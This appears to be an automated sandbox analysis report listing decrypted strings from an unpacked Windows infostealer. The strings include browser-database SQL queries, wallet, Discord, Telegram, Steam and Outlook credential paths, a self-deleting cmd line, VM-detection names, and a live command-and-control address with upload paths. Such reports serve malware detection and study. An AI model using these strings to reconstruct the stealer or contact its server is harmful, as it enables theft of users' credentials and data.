Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: encryptedUsername
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: encryptedPassword
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: guid
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: cookies.sqlite
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: formhistory.sqlite
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: places.sqlite
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: plugins
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Local Extension Settings
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Sync Extension Settings
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: IndexedDB
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Opera Stable
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Opera GX Stable
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CURRENT
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: chrome-extension_
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Local State
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: profiles.ini
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: chrome
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: opera
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: firefox
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wallets
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %08lX%04lX%lu
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ProductName
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: x32
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: x64
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ProcessorNameString
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DisplayName
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DisplayVersion
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Network Info:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - IP: IP?
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Country: ISO?
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: System Summary:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - HWID:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - OS:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Architecture:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - UserName:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Computer Name:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Local Time:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - UTC:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Language:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Keyboards:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Laptop:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Running Path:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - CPU:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Threads:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Cores:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - RAM:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - Display Resolution:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: - GPU:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: User Agents:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Installed Apps:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: All Users:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Current User:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process List:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: system_info.txt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: freebl3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: mozglue.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: msvcp140.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: nss3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: softokn3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: vcruntime140.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Temp\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: .exe
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: runas
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: open
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /c start
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %DESKTOP%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %APPDATA%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %DOCUMENTS%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %PROGRAMFILES%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %RECENT%
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: *.lnk
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: files
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \discord\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Local Storage\leveldb
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Telegram Desktop\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: key_datas
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: map*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: F8806DD0C461824F*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Telegram
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Tox
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: *.tox
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: *.ini
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Password
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 00000001
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 00000002
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 00000003
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: 00000004
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Pidgin
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \.purple\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: accounts.xml
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: token:
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Software\Valve\Steam
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SteamPath
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \config\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ssfn*
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: config.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DialogConfig.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: libraryfolders.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: loginusers.vdf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Steam\
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sqlite3.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: browsers
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: done
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: soft
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: \Discord\tokens.txt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: https
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: POST
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HTTP/1.1
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: hwid
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: build
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: token
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: file_name
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: file
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: message
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: screenshot.jpg
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetProcAddress
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcatA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OpenEventA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateEventA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CloseHandle
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Sleep
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HeapAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcpyA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrlenA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ExitProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: advapi32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: gdi32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: user32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: crypt32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ntdll.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateDCA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ReleaseDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sscanf
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VMwareVMware
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HAL9TH
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: JohnDoe
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DISPLAY
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: silence
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: sila
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalLock
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HeapFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: IsWow64Process
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process32Next
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLocalTime
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FreeLibrary
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: Process32First
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DeleteFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindNextFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LocalFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindClose
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: LocalAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ReadFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SetFilePointer
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: WriteFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CopyFileA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: VirtualProtect
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetLastError
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: lstrcpynA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: OpenProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: TerminateProcess
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ole32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wininet.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: shell32.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: psapi.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SelectObject
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BitBlt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: DeleteObject
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GdipFree
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoUninitialize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoInitialize
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetWindowRect
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetDC
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CloseWindow
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wsprintfA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CharToOemW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: wsprintfW
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegCloseKey
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetConnectA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetOpenA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetReadFile
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrCmpCA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrStrA
Source: 25.2.9fa327eb6c.exe.26b0e67.1.raw.unpack String decryptor: StrCmpCW
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
